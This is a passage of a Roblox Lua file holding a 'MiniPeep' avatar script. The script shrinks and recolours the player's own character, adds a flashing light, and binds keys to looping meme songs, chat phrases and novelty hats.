  1315. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(angle*0.05, angle*0.1, -0.06)
  1316. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-angle*0.05, -angle*0.1, 0.06)
  1317. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(0.2), 0, 0)
  1318. rj.C0 = CFrame.new(0, math.abs(angle*0.05), 0) * CFrame.Angles(0, math.abs(angle*0.1), 0)
  1319. end
  1320. end
  1321. end)
  1322. plr.Chatted:connect(function(msg)
  1323. game:service'Chat':Chat(head, msg, 0)
  1324. if msg == "reset/" then
  1325. char:breakJoints()
  1326. end
  1327. if msg == "resp/" then
  1328. plr:LoadCharacter()
  1329. end
  1330. end)
  1331. end)
  1332. if not ran and err then
  1333. print(err)
  1334. end
  1335. ]]
  1336. MiniPeep = [[
  1337. local ran,err = ypcall(function()
  1338. plr = game:service'Players'.LocalPlayer
  1339. char = plr.Character
  1340. mouse = plr:GetMouse()
  1341. humanoid = char:findFirstChild("Humanoid")
  1342. torso = char:findFirstChild("Torso")
  1343. head = char.Head
  1344. ra = char:findFirstChild("Right Arm")
  1345. la = char:findFirstChild("Left Arm")
  1346. rl = char:findFirstChild("Right Leg")
  1347. ll = char:findFirstChild("Left Leg")
  1348. rs = torso:findFirstChild("Right Shoulder")
  1349. ls = torso:findFirstChild("Left Shoulder")
  1350. rh = torso:findFirstChild("Right Hip")
  1351. lh = torso:findFirstChild("Left Hip")
  1352. neck = torso:findFirstChild("Neck")
  1353. rj = char:findFirstChild("HumanoidRootPart"):findFirstChild("RootJoint")
  1354. anim = char:findFirstChild("Animate")
  1355. rootpart = char:findFirstChild("HumanoidRootPart")
  1356. camera = workspace.CurrentCamera
  1357. if anim then
  1358. anim:Destroy()
  1359. end
  1360. rj.C0 = CFrame.new()
  1361. rj.C1 = CFrame.new()
  1362. super_annoying = Instance.new("Sound", head)
  1363. super_annoying.SoundId = "http://www.roblox.com/asset/?id=164161056"
  1364. super_annoying.Volume = 1
  1365. super_annoying.Looped = true
  1366. uni = Instance.new("Sound", head)
  1367. uni.SoundId = "http://www.roblox.com/asset/?id=141444871"
  1368. uni.Volume = 1
  1369. uni.Looped = true
  1370. ann = Instance.new("Sound", head)
  1371. ann.SoundId = "http://www.roblox.com/asset/?id=130808056"
  1372. ann.Volume = 1
  1373. ann.Looped = true
  1374. fwutters = Instance.new("Sound", head)
  1375. fwutters.SoundId = "http://www.roblox.com/asset/?id=148896355"
  1376. fwutters.Volume = 1
  1377. fwutters.Looped = true
  1378. loll = Instance.new("Sound", head)
  1379. loll.SoundId = "http://www.roblox.com/asset/?id=130803007"
  1380. loll.Volume = 1
  1381. loll.Looped = true
  1382. land_of_swords = Instance.new("Sound", head)
  1383. land_of_swords.SoundId = "http://www.roblox.com/asset/?id=142357253"
  1384. land_of_swords.Volume = 1
  1385. land_of_swords.Looped = true
  1386. qq = Instance.new("Sound", head)
  1387. qq.SoundId = "http://www.roblox.com/asset/?id=142295308"
  1388. qq.Volume = 1
  1389. qq.Looped = true
  1390. doge = Instance.new("Sound", head)
  1391. doge.SoundId = "http://www.roblox.com/asset/?id=138213729"
  1392. doge.Volume = 1
  1393. doge.Looped = true
  1394. nyan = Instance.new("Sound", head)
  1395. nyan.SoundId = "http://www.roblox.com/asset/?id=142332086"
  1396. nyan.Volume = 1
  1397. nyan.Looped = true
  1398. sctmn = Instance.new("Sound", head)
  1399. sctmn.SoundId = "http://www.roblox.com/asset/?id=143620887"
  1400. sctmn.Volume = 1
  1401. sctmn.Looped = true
  1402. barrel_roll = Instance.new("Sound", head)
  1403. barrel_roll.SoundId = "http://www.roblox.com/asset/?id=143735700"
  1404. barrel_roll.Volume = 1
  1405. barrel_roll.Looped = true
  1406. dubstep_gun = Instance.new("Sound", head)
  1407. dubstep_gun.SoundId = "http://www.roblox.com/asset/?id=148457569"
  1408. dubstep_gun.Volume = 1
  1409. dubstep_gun.Looped = true
  1410. you_are_pirate = Instance.new("Sound", head)
  1411. you_are_pirate.SoundId = "http://www.roblox.com/asset/?id=148896147"
  1412. you_are_pirate.Volume = 1
  1413. you_are_pirate.Looped = true
  1414. cant_touch = Instance.new("Sound", head)
  1415. cant_touch.SoundId = "http://www.roblox.com/asset/?id=131280929"
  1416. cant_touch.Volume = 1
  1417. cant_touch.Looped = true
  1418. gangy_style = Instance.new("Sound", head)
  1419. gangy_style.SoundId = "http://www.roblox.com/asset/?id=130844430"
  1420. gangy_style.Volume = 1
  1421. gangy_style.Looped = true
  1422. fox_say = Instance.new("Sound", head)
  1423. fox_say.SoundId = "http://www.roblox.com/asset/?id=130797915"
  1424. fox_say.Volume = 1
  1425. fox_say.Looped = true
  1426. durk = Instance.new("Sound", head)
  1427. durk.SoundId = "http://www.roblox.com/asset/?id=144373608"
  1428. durk.Volume = 1
  1429. durk.Looped = true
  1430. sax_guy = Instance.new("Sound", head)
  1431. sax_guy.SoundId = "http://www.roblox.com/asset/?id=130794684"
  1432. sax_guy.Volume = 1
  1433. sax_guy.Looped = true
  1434. heman = Instance.new("Sound", head)
  1435. heman.SoundId = "http://www.roblox.com/asset/?id=131102548"
  1436. heman.Volume = 1
  1437. heman.Looped = true
  1438. justin = Instance.new("Sound", head)
  1439. justin.SoundId = "http://www.roblox.com/asset/?id=138154702"
  1440. justin.Volume = 1
  1441. justin.Looped = true
  1442. brony_music = Instance.new("Sound", head)
  1443. brony_music.SoundId = "http://www.roblox.com/asset/?id=143768403"
  1444. brony_music.Volume = 1
  1445. brony_music.Looped = true
  1446. spitfire = Instance.new("Sound", head)
  1447. spitfire.SoundId = "http://www.roblox.com/asset/?id=130776739"
  1448. spitfire.Volume = 1
  1449. spitfire.Looped = true
  1450. burn_dem = Instance.new("Sound", head)
  1451. burn_dem.SoundId = "http://www.roblox.com/asset/?id=132399469"
  1452. burn_dem.Volume = 1
  1453. burn_dem.Looped = true
  1454. cant = Instance.new("Sound", head)
  1455. cant.SoundId = "http://www.roblox.com/asset/?id=131122314"
  1456. cant.Volume = 1
  1457. cant.Looped = true
  1458. if char:findFirstChild("Shirt") then
  1459. char:findFirstChild("Shirt"):Destroy()
  1460. end
  1461. if char:findFirstChild("Pants") then
  1462. char:findFirstChild("Pants"):Destroy()
  1463. end
  1464. if char:findFirstChild("Shirt Graphic") then
  1465. char:findFirstChild("Shirt Graphic"):Destroy()
  1466. end
  1467. Instance.new("HumanoidController", game:service'ControllerService')
  1468. Instance.new("SkateboardController", game:service'ControllerService')
  1469. Instance.new("VehicleController", game:service'ControllerService')
  1470. rh.Parent = nil
  1471. lh.Parent = nil
  1472. rs.Parent = nil
  1473. ls.Parent = nil
  1474. neck.Parent = nil
  1475. rj.Parent = nil
  1476. rl.FormFactor = "Custom"
  1477. ll.FormFactor = "Custom"
  1478. ra.FormFactor = "Custom"
  1479. la.FormFactor = "Custom"
  1480. torso.FormFactor = "Custom"
  1481. head.FormFactor = "Custom"
  1482. rootpart.FormFactor = "Custom"
  1483. rootpart.Size = Vector3.new(.4, .4, .2)
  1484. rl.Size = Vector3.new(.2, .4, .2)
  1485. ll.Size = Vector3.new(.2, .4, .2)
  1486. ra.Size = Vector3.new(.2, .4, .2)
  1487. la.Size = Vector3.new(.2, .4, .2)
  1488. torso.Size = Vector3.new(.4, .4, .2)
  1489. head.Size = Vector3.new(.4, .2, .2)
  1490. rh.Parent = torso
  1491. lh.Parent = torso
  1492. rs.Parent = torso
  1493. ls.Parent = torso
  1494. neck.Parent = torso
  1495. rj.Parent = rootpart
  1496. if torso:findFirstChild("roblox") then
  1497. local p = Instance.new("Part", char)
  1498. p.FormFactor = "Custom"
  1499. p.Size = torso.Size
  1500. p.Transparency = 1
  1501. p:BreakJoints()
  1502. local w = Instance.new("Weld", char)
  1503. w.Part0 = p
  1504. w.Part1 = torso
  1505. torso:findFirstChild("roblox").Parent = p
  1506. end
  1507. mesh1 = Instance.new("SpecialMesh", torso)
  1508. mesh1.Name = "Mesh"
  1509. mesh1.Scale = torso.Size - Vector3.new(torso.Size.x/2, torso.Size.y/2, 0)
  1510. mesh1.MeshId = "rbxasset://fonts/torso.mesh"
  1511. mesh2 = Instance.new("SpecialMesh", la)
  1512. mesh2.Name = "Mesh"
  1513. mesh2.Scale = la.Size - Vector3.new(0, la.Size.y/2, 0)
  1514. mesh2.MeshId = "rbxasset://fonts/leftarm.mesh"
  1515. mesh3 = Instance.new("SpecialMesh", ra)
  1516. mesh3.Name = "Mesh"
  1517. mesh3.Scale = ra.Size - Vector3.new(0, ra.Size.y/2, 0)
  1518. mesh3.MeshId = "rbxasset://fonts/rightarm.mesh"
  1519. mesh4 = Instance.new("SpecialMesh", ll)
  1520. mesh4.Name = "Mesh"
  1521. mesh4.Scale = ll.Size - Vector3.new(0, ll.Size.y/2, 0)
  1522. mesh4.MeshId = "rbxasset://fonts/leftleg.mesh"
  1523. mesh5 = Instance.new("SpecialMesh", rl)
  1524. mesh5.Name = "Mesh"
  1525. mesh5.Scale = rl.Size - Vector3.new(0, rl.Size.y/2, 0)
  1526. mesh5.MeshId = "rbxasset://fonts/rightleg.mesh"
  1527. ls.C0 = CFrame.new(-.3,.1,0)
  1528. ls.C1 = CFrame.new(0,.1,0)
  1529. rs.C0 = CFrame.new(.3,.1,0)
  1530. rs.C1 = CFrame.new(0,.1,0)
  1531. rh.C0 = CFrame.new(.1,-.2,0)
  1532. rh.C1 = CFrame.new(0, .2, 0)
  1533. lh.C0 = CFrame.new(-.1,-.2,0)
  1534. lh.C1 = CFrame.new(0, .2, 0)
  1535. neck.C0 = CFrame.new(0,.2,0)
  1536. neck.C1 = CFrame.new(0,-.1,0)
  1537. bodyc = char:findFirstChild("Body Colors")
  1538. if bodyc then
  1539. bodyc:Destroy()
  1540. end
  1541. wait(0.1)
  1542. skincolor = {"Pastel brown"}
  1543. clothcolor = {"Dark green", "Really red","Bright yellow","Bright orange","Lavender","Royal purple","Bright blue","Toothpaste","Institutional white","Hot pink"}
  1544. skincolorrandom = BrickColor.new(skincolor[math.random(1, #skincolor)])
  1545. clothcolorrandom = BrickColor.new(clothcolor[math.random(1, #clothcolor)])
  1546. function restorecolors()
  1547. for _,bp in pairs(char:children()) do
  1548. if bp:IsA("BasePart") then
  1549. bp.BrickColor = skincolorrandom
  1550. end
  1551. end
  1552. torso.BrickColor = clothcolorrandom
  1553. ll.BrickColor = clothcolorrandom
  1554. rl.BrickColor = clothcolorrandom
  1555. end
  1556. restorecolors()
  1557. local LightForTorso = Instance.new("PointLight", head)
  1558. LightForTorso.Range = 15
  1559. LightForTorso.Brightness = 20
  1560. coroutine.wrap(function()
  1561. while LightForTorso ~= nil do
  1562. LightForTorso.Color = Color3.new(math.random(), math.random(), math.random())
  1563. wait(0.3)
  1564. end
  1565. end)()
  1566. local slidecount = 0
  1567. local slidecountmax = 0
  1568. local anim = ""
  1569. local lastanim = anim
  1570. local speed = 0
  1571. local looking = false
  1572. local dancing = false
  1573. local superannoying = false
  1574. local barrelroll = false
  1575. local dubstepgun = false
  1576. local foxie = false
  1577. local durka = false
  1578. local saxguy = false
  1579. local heya = false
  1580. local jb = false
  1581. local bronymusic = false
  1582. local sheddy = false
  1583. local burndem = false
  1584. local canttt = false
  1585. local global_wait = 0
  1586. count = 0
  1587. countspeed = 1
  1588. sine = 0
  1589. sinespeed = 1
  1590. humanoid.WalkSpeed = 20
  1591. local controllerService = game:GetService("ControllerService")
  1592. local controller = controllerService:GetChildren()[1]
  1593. local colors = {"Dark green", "Really red","Bright yellow","Bright orange","Lavender","Royal purple","Bright blue","Toothpaste","Institutional white","Hot pink"}
  1594. humanoid.Died:connect(function()
  1595. for cframe_parts = 0, 100 do
  1596. local p = Instance.new("Part")
  1597. p.FormFactor = "Custom"
  1598. p.BrickColor = BrickColor.new(colors[math.random(1, #colors)])
  1599. p.Size = Vector3.new(1, 1, 1)
  1600. Instance.new("BlockMesh", p).Scale = Vector3.new(0.05, 0.05, 0.05)
  1601. p.Locked = true
  1602. p.CanCollide = false
  1603. p.Anchored = true
  1604. p.CFrame = torso.CFrame * CFrame.Angles(math.random(-36, 36),math.random(-36, 36),math.random(-36, 36))
  1605. p.Parent = workspace
  1606. game:service'Debris':AddItem(p, 5)
  1607. coroutine.wrap(function()
  1608. while wait() do
  1609. if p ~= nil then
  1610. p.CFrame = p.CFrame * CFrame.new(0, 0.085, 0)
  1611. p.Mesh.Scale = p.Mesh.Scale - Vector3.new(0.005, 0, 0.005) + Vector3.new(0, 0.01, 0)
  1612. p.Transparency = p.Transparency + 0.015
  1613. else
  1614. break
  1615. end
  1616. end
  1617. end)()
  1618. end
  1619. for _,v in pairs(char:children()) do
  1620. if v:IsA("Part") then
  1621. v:Destroy()
  1622. end
  1623. end
  1624. end)
  1625. mouse.KeyDown:connect(function(k)
  1626. if string.byte(k) == 50 then
  1627. if dancing then return end
  1628. sitting = not sitting
  1629. if sitting then
  1630. local ray = Ray.new(torso.Position, Vector3.new(0, -1, 0))
  1631. local hitz,enz = workspace:FindPartOnRay(ray, char)
  1632. if hitz then
  1633. controller.Parent = nil
  1634. humanoid.WalkSpeed = 0
  1635. coroutine.wrap(function()
  1636. while wait() do
  1637. humanoid.PlatformStand = true
  1638. if sitting == false then humanoid.PlatformStand = false break end
  1639. end
  1640. end)()
  1641. rj.C0 = CFrame.new(0, -0.35, 0) * CFrame.Angles(math.rad(10), 0, 0)
  1642. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(math.pi/2-math.rad(10), 0, -math.pi/16)
  1643. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(math.pi/2-math.rad(10), 0, math.pi/16)
  1644. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(-math.rad(10), 0, -math.pi/10)
  1645. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(-math.rad(10), 0, math.pi/10)
  1646. miniweld = Instance.new("Weld", char)
  1647. miniweld.C0 = hitz.CFrame:toObjectSpace(rootpart.CFrame)
  1648. miniweld.Part0 = hitz
  1649. miniweld.Part1 = rootpart
  1650. else
  1651. sitting = false
  1652. return
  1653. end
  1654. else
  1655. if miniweld then
  1656. miniweld:Destroy()
  1657. end
  1658. controller.Parent = controllerService
  1659. humanoid.PlatformStand = false
  1660. humanoid.WalkSpeed = 30
  1661. end
  1662. end
  1663. if string.byte(k) == 32 then
  1664. fwutters:Stop()
  1665. uni:Stop()
  1666. loll:Stop()
  1667. qq:Stop()
  1668. ann:Stop()
  1669. nyan:Stop()
  1670. sctmn:Stop()
  1671. cant:Stop()
  1672. superannoying = false
  1673. barrelroll = false
  1674. heya = false
  1675. dubstepgun = false
  1676. youpirate = false
  1677. canttouch = false
  1678. gangnam = false
  1679. sheddy = false
  1680. durka = false
  1681. saxguy = false
  1682. foxie = false
  1683. burndem = false
  1684. bronymusic = false
  1685. canttt = false
  1686. land_of_swords:stop()
  1687. brony_music:stop()
  1688. fox_say:stop()
  1689. spitfire:stop()
  1690. heman:stop()
  1691. doge:Stop()
  1692. justin:stop()
  1693. jb = false
  1694. durk:stop()
  1695. restorecolors()
  1696. burn_dem:stop()
  1697. if hat then
  1698. hat:Destroy()
  1699. end
  1700. sax_guy:stop()
  1701. gangy_style:stop()
  1702. cant_touch:stop()
  1703. you_are_pirate:stop()
  1704. dubstep_gun:stop()
  1705. super_annoying:stop()
  1706. barrel_roll:stop()
  1707. dancing = false
  1708. global_wait = 0
  1709. LightForTorso.Color = torso.BrickColor.Color
  1710. end
  1711. if k == "z" then
  1712. if dancing then return end
  1713. if not sitting then
  1714. dancing = true
  1715. game:GetService("Chat"):Chat(head,"Jb Time!",0)
  1716. jb = true
  1717. super_annoying:play()
  1718. hat = Instance.new("Part", char)
  1719. hat.FormFactor = "Custom"
  1720. hat.CanCollide = false
  1721. hat.Size = head.Size
  1722. hat.Locked = true
  1723. hat:breakJoints()
  1724. local hatmesh = Instance.new("SpecialMesh", hat)
  1725. hatmesh.MeshId = "http://www.roblox.com/asset/?id=nope"
  1726. hatmesh.TextureId = "http://www.roblox.com/asset/?id=nope"
  1727. hatmesh.Scale = Vector3.new(.2, .2, .2)
  1728. local hatweld = Instance.new("Weld", hat)
  1729. hatweld.Part0 = hat
  1730. hatweld.Part1 = head
  1731. hatweld.C0 = CFrame.new(0, -0.6, 0)
  1732. end
  1733. end
  1734. if k == "=" then
  1735. if dancing then return end
  1736. if not sitting then
  1737. dancing = true
  1738. canttt = true
  1739. cant:play()
  1740. game:GetService("Chat"):Chat(head,"Can't touch me!",0)
  1741. end
  1742. end
  1743. if k == "u" then
  1744. if dancing then return end
  1745. if not sitting then
  1746. dancing = true
  1747. game:GetService("Chat"):Chat(head,"I'm a scat man!",0)
  1748. saxguy = true
  1749. sctmn:play()
  1750. hat = Instance.new("Part", char)
  1751. hat.FormFactor = "Custom"
  1752. hat.CanCollide = false
  1753. hat.Size = head.Size
  1754. hat.Locked = true
  1755. hat:breakJoints()
  1756. local hatmesh = Instance.new("SpecialMesh", hat)
  1757. hatmesh.MeshId = "http://www.roblox.com/asset/?id=43996479"
  1758. hatmesh.TextureId = "http://www.roblox.com/asset/?id=43997070"
  1759. hatmesh.Scale = Vector3.new(.0925, .0925, .0925)
  1760. local hatweld = Instance.new("Weld", hat)
  1761. hatweld.Part0 = hat
  1762. hatweld.Part1 = la
  1763. hatweld.C0 = CFrame.new(-0.18, -0.05, .04) * CFrame.Angles(math.pi - math.rad(18), 0, math.pi/4)
  1764. end
  1765. end
  1766.  
  1767. if k == "k" then
  1768. if dancing then return end
  1769. if not sitting then
  1770. dancing = true
  1771. game:GetService("Chat"):Chat(head,"Ain't anybody got time for dat!",0)
  1772. sheddy = true
  1773. spitfire:play()
  1774. end
  1775. end
  1776. if k == "," then
  1777. if dancing then return end
  1778. if not sitting then
  1779. dancing = true
  1780. game:GetService("Chat"):Chat(head,"Land of swords!",0)
  1781. foxie = true
  1782. land_of_swords:play()
  1783. hat = Instance.new("Part", char)
  1784. hat.FormFactor = "Custom"
  1785. hat.CanCollide = false
  1786. hat.Size = head.Size
  1787. hat.Locked = true
  1788. hat:breakJoints()
  1789. local hatmesh = Instance.new("SpecialMesh", hat)
  1790. hatmesh.MeshId = "http://www.roblox.com/asset/?id=1285237"
  1791. hatmesh.TextureId = "http://www.roblox.com/asset/?id=118666588"
  1792. hatmesh.Scale = Vector3.new(.25, .25, .25)
  1793. local hatweld = Instance.new("Weld", hat)
  1794. hatweld.Part0 = hat
  1795. hatweld.Part1 = la
  1796. hatweld.C0 = CFrame.new(-0.18, -0.05, .04) * CFrame.Angles(math.pi - math.rad(18), 0, math.pi/4)
  1797. end
  1798. end
  1799.  
  1800. if k == "p" then
  1801. if dancing then return end
  1802. if not sitting then
  1803. dancing = true
  1804. foxie = true
  1805. game:GetService("Chat"):Chat(head,"It's raining tacos!",0)
  1806. qq:play()
  1807. hat = Instance.new("Part", char)
  1808. hat.FormFactor = "Custom"
  1809. hat.CanCollide = false
  1810. hat.Size = head.Size
  1811. hat.Locked = true
  1812. hat:breakJoints()
  1813. local hatmesh = Instance.new("SpecialMesh", hat)
  1814. hatmesh.MeshId = "http://www.roblox.com/asset/?id=14846869"
  1815. hatmesh.TextureId = "http://www.roblox.com/asset/?id=14846834"
  1816. hatmesh.Scale = Vector3.new(.25, .25, .25)
  1817. local hatweld = Instance.new("Weld", hat)
  1818. hatweld.Part0 = hat
  1819. hatweld.Part1 = la
  1820. hatweld.C0 = CFrame.new(-0.18, -0.05, .04) * CFrame.Angles(math.pi - math.rad(18), 0, math.pi/4)
  1821. end
  1822. end
  1823.  
  1824. if k == ";" then
  1825. if dancing then return end
  1826. if not sitting then
  1827. dancing = true
  1828. game:GetService("Chat"):Chat(head,"PICK THE UNICORN!",0)
  1829. heya = true
  1830. uni:play()
  1831. hat = Instance.new("Part", char)
  1832. hat.FormFactor = "Custom"
  1833. hat.CanCollide = false
  1834. hat.Size = head.Size
  1835. hat.Locked = true
  1836. hat:breakJoints()
  1837. local hatmesh = Instance.new("SpecialMesh", hat)
  1838. hatmesh.MeshId = "http://www.roblox.com/asset/?id=84003494"
  1839. hatmesh.TextureId = "http://www.roblox.com/asset/?id=83992632"
  1840. hatmesh.Scale = Vector3.new(.25, .25, .25)
  1841. local hatweld = Instance.new("Weld", hat)
  1842. hatweld.Part0 = hat
  1843. hatweld.Part1 = la
  1844. hatweld.C0 = CFrame.new(-0.18, -0.05, .04) * CFrame.Angles(math.pi - math.rad(18), 0, math.pi/4)
  1845. end
  1846. end
  1847.  
  1848. if k == "n" then
  1849. if dancing then return end
  1850. if not sitting then
  1851. dancing = true
  1852. game:GetService("Chat"):Chat(head,"test!",0)
  1853. gangnam = true
  1854. gangy_style:play()
  1855. end
  1856. end
  1857. if k == "t" then
  1858. if dancing then return end
  1859. if not sitting then
  1860. dancing = true
  1861. game:GetService("Chat"):Chat(head,"x3",0)
  1862. heya = true
  1863. ann:play()
  1864. end
  1865. end
  1866. if k == "-" then
  1867. if dancing then return end
  1868. if not sitting then
  1869. dancing = true
  1870. game:GetService("Chat"):Chat(head,"TROLOLOLOLOLO",0)
  1871. heya = true
  1872. loll:play()
  1873. end
  1874. end
  1875.  
  1876. if k == "r" then
  1877. if dancing then return end
  1878. if not sitting then
  1879. dancing = true
  1880. game:GetService("Chat"):Chat(head,"Love is in Bloom!",0)
  1881. burndem = true
  1882. burn_dem:play()
  1883. end
  1884. end
  1885. if k == "x" then
  1886. if dancing then return end
  1887. if not sitting then
  1888. dancing = true
  1889. game:GetService("Chat"):Chat(head,"Do the barrel roll!",0)
  1890. barrelroll = true
  1891. barrel_roll:play()
  1892. hat = Instance.new("Part", char)
  1893. hat.FormFactor = "Custom"
  1894. hat.CanCollide = false
  1895. hat.Size = torso.Size
  1896. hat.Locked = true
  1897. hat:breakJoints()
  1898. local hatmesh = Instance.new("SpecialMesh", hat)
  1899. hatmesh.MeshId = "http://www.roblox.com/asset/?id=29873142"
  1900. hatmesh.TextureId = "http://www.roblox.com/asset/?id=31467063"
  1901. hatmesh.Scale = Vector3.new(.22, .2, .22)
  1902. local hatweld = Instance.new("Weld", hat)
  1903. hatweld.Part0 = hat
  1904. hatweld.Part1 = torso
  1905. end
  1906. end
  1907. if k == "h" then
  1908. if dancing then return end
  1909. if not sitting then
  1910. dancing = true
  1911. game:GetService("Chat"):Chat(head,":D",0)
  1912. heman:play()
  1913. heya = true
  1914. hat = Instance.new("Part", char)
  1915. hat.FormFactor = "Custom"
  1916. hat.CanCollide = false
  1917. hat.Size = torso.Size + Vector3.new(0.01, 0.01, 0.01)
  1918. hat.Locked = true
  1919. hat.BrickColor = BrickColor.new("Hot pink")
  1920. hat:breakJoints()
  1921. local hatweld = Instance.new("Weld", hat)
  1922. hatweld.Part0 = hat
  1923. hatweld.Part1 = torso
  1924. end
  1925. end
  1926. if k == "j" then
  1927. if dancing then return end
  1928. if not sitting then
  1929. dancing = true
  1930. game:GetService("Chat"):Chat(head,"Don drop dat durk durk!",0)
  1931. justin:play()
  1932. jb = true
  1933. hat = Instance.new("Part", char)
  1934. hat.FormFactor = "Custom"
  1935. hat.CanCollide = false
  1936. hat.Size = head.Size
  1937. hat.Locked = true
  1938. hat.BrickColor = BrickColor.new("Hot pink")
  1939. hat:breakJoints()
  1940. local hatmesh = Instance.new("SpecialMesh", hat)
  1941. hatmesh.MeshId = "http://www.roblox.com/asset/?id=19999424"
  1942. hatmesh.TextureId = "http://www.roblox.com/asset/?id=20571982"
  1943. hatmesh.Scale = Vector3.new(.23, .23, .23)
  1944. local hatweld = Instance.new("Weld", hat)
  1945. hatweld.Part0 = hat
  1946. hatweld.Part1 = head
  1947. hatweld.C0 = CFrame.new(0.025, -0.05, 0)
  1948. end
  1949. end
  1950.  
  1951. if k == "'" then
  1952. if dancing then return end
  1953. if not sitting then
  1954. dancing = true
  1955. fwutters:play()
  1956. game:GetService("Chat"):Chat(head,"Da Fwutters!",0)
  1957. bronymusic = true
  1958. for _,bp in pairs(char:children()) do
  1959. if bp:IsA("BasePart") then
  1960. bp.BrickColor = BrickColor.new("Cool yellow")
  1961. end
  1962. end
  1963. hat = Instance.new("Part", char)
  1964. hat.FormFactor = "Custom"
  1965. hat.CanCollide = false
  1966. hat.Size = head.Size
  1967. hat.Locked = true
  1968. hat.BrickColor = BrickColor.new("Cool yellow")
  1969. hat:breakJoints()
  1970. local hatmesh = Instance.new("SpecialMesh", hat)
  1971. hatmesh.MeshId = "http://www.roblox.com/asset/?id=82348513"
  1972. hatmesh.TextureId = "http://www.roblox.com/asset/?id=36527326"
  1973. hatmesh.Scale = Vector3.new(.28, .28, .28)
  1974. local hatweld = Instance.new("Weld", hat)
  1975. hatweld.Part0 = hat
  1976. hatweld.Part1 = head
  1977. hatweld.C0 = CFrame.new(0.025, 0, 0)
  1978. end
  1979. end
  1980.  
  1981. if k == "c" then
  1982. if dancing then return end
  1983. if not sitting then
  1984. dancing = true
  1985. game:GetService("Chat"):Chat(head,"Yayyy! Caramell!",0)
  1986. dubstepgun = true
  1987. dubstep_gun:play()
  1988. end
  1989. end
  1990.  
  1991. if k == "v" then
  1992. if dancing then return end
  1993. if not sitting then
  1994. dancing = true
  1995. game:GetService("Chat"):Chat(head,"I am a pirate!",0)
  1996. youpirate = true
  1997. you_are_pirate:play()
  1998. hat = Instance.new("Part", char)
  1999. hat.FormFactor = "Custom"
  2000. hat.CanCollide = false
  2001. hat.Size = head.Size
  2002. hat.Locked = true
  2003. hat:breakJoints()
  2004. local hatmesh = Instance.new("SpecialMesh", hat)
  2005. hatmesh.MeshId = "http://www.roblox.com/asset/?id=1028848"
  2006. hatmesh.TextureId = "http://www.roblox.com/asset/?id=1028847"
  2007. hatmesh.Scale = Vector3.new(.2, .2, .2)
  2008. local hatweld = Instance.new("Weld", hat)
  2009. hatweld.Part0 = hat
  2010. hatweld.Part1 = head
  2011. hatweld.C0 = CFrame.new(0, -0.15, 0)
  2012. end
  2013. end
  2014. if k == "m" then
  2015. if dancing then return end
  2016. if not sitting then
  2017. dancing = true
  2018. game:GetService("Chat"):Chat(head,"Can't touch this!",0)
  2019. canttouch = true
  2020. cant_touch:play()
  2021. end
  2022. end
  2023. if k == "b" then
  2024. if dancing then return end
  2025. if not sitting then
  2026. dancing = true
  2027. game:GetService("Chat"):Chat(head,"Now for brony music!",0)
  2028. bronymusic = true
  2029. brony_music:play()
  2030. for _,bp in pairs(char:children()) do
  2031. if bp:IsA("BasePart") then
  2032. bp.BrickColor = BrickColor.new("Pink")
  2033. end
  2034. end
  2035. hat = Instance.new("Part", char)
  2036. hat.FormFactor = "Custom"
  2037. hat.CanCollide = false
  2038. hat.Size = head.Size
  2039. hat.Locked = true
  2040. hat.BrickColor = BrickColor.new("Lavender")
  2041. hat:breakJoints()
  2042. local hatmesh = Instance.new("SpecialMesh", hat)
  2043. hatmesh.MeshId = "http://www.roblox.com/asset/?id=1095708"
  2044. hatmesh.TextureId = "http://www.roblox.com/asset/?id=60375192"
  2045. hatmesh.Scale = Vector3.new(.25, .25, .45)
  2046. local hatweld = Instance.new("Weld", hat)
  2047. hatweld.Part0 = hat
  2048. hatweld.Part1 = head
  2049. hatweld.C0 = CFrame.new(0, -0.1, 0.05)
  2050. end
  2051. end
  2052.  
  2053. if k == "y" then
  2054. if dancing then return end
  2055. if not sitting then
  2056. dancing = true
  2057. bronymusic = true
  2058. nyan:play()
  2059. for _,bp in pairs(char:children()) do
  2060. if bp:IsA("BasePart") then
  2061. bp.BrickColor = BrickColor.new("Dark stone grey")
  2062. end
  2063. end
  2064. game:GetService("Chat"):Chat(head,"Nyan nyan nyan nyan!",0)
  2065. hat = Instance.new("Part", char)
  2066. hat.FormFactor = "Custom"
  2067. hat.CanCollide = false
  2068. hat.Size = head.Size
  2069. hat.Locked = true
  2070. hat.BrickColor = BrickColor.new("Dark stone grey")
  2071. hat:breakJoints()
  2072. local hatmesh = Instance.new("SpecialMesh", hat)
  2073. hatmesh.MeshId = "http://www.roblox.com/asset/?id=1374148"
  2074. hatmesh.TextureId = "http://www.roblox.com/asset/?id=117119031"
  2075. hatmesh.Scale = Vector3.new(.2, .30, .2)
  2076. local hatweld = Instance.new("Weld", hat)
  2077. hatweld.Part0 = hat
  2078. hatweld.Part1 = head
  2079. hatweld.C0 = CFrame.new(0, -0.15, 0.05)
  2080. end
  2081. end
  2082.  
  2083. if k == "l" then
  2084. if dancing then return end
  2085. if not sitting then
  2086. dancing = true
  2087. game:GetService("Chat"):Chat(head,"wot fox sey?!",0)
  2088. foxie = true
  2089. fox_say:play()
  2090. hat = Instance.new("Part", char)
  2091. hat.FormFactor = "Custom"
  2092. hat.CanCollide = false
  2093. hat.Size = head.Size
  2094. hat.Locked = true
  2095. hat:breakJoints()
  2096. local hatmesh = Instance.new("SpecialMesh", hat)
  2097. hatmesh.MeshId = "http://www.roblox.com/asset/?id=25266225"
  2098. hatmesh.TextureId = "http://www.roblox.com/asset/?id=25266210"
  2099. hatmesh.Scale = Vector3.new(.2, .2, .2)
  2100. local hatweld = Instance.new("Weld", hat)
  2101. hatweld.Part0 = hat
  2102. hatweld.Part1 = head
  2103. hatweld.C0 = CFrame.new(0, -0.1, 0)
  2104. end
  2105.  
  2106. end
  2107. if k == "f" then
  2108. if dancing then return end
  2109. if not sitting then
  2110. dancing = true
  2111. game:GetService("Chat"):Chat(head,"RAINBOW FACTORY!",0)
  2112. durka = true
  2113. durk:play()
  2114. end
  2115. end
  2116. if k == "g" then
  2117. if dancing then return end
  2118. if not sitting then
  2119. dancing = true
  2120. game:GetService("Chat"):Chat(head,"Now for some more music",0)
  2121. saxguy = true
  2122. sax_guy:play()
  2123. hat = Instance.new("Part", char)
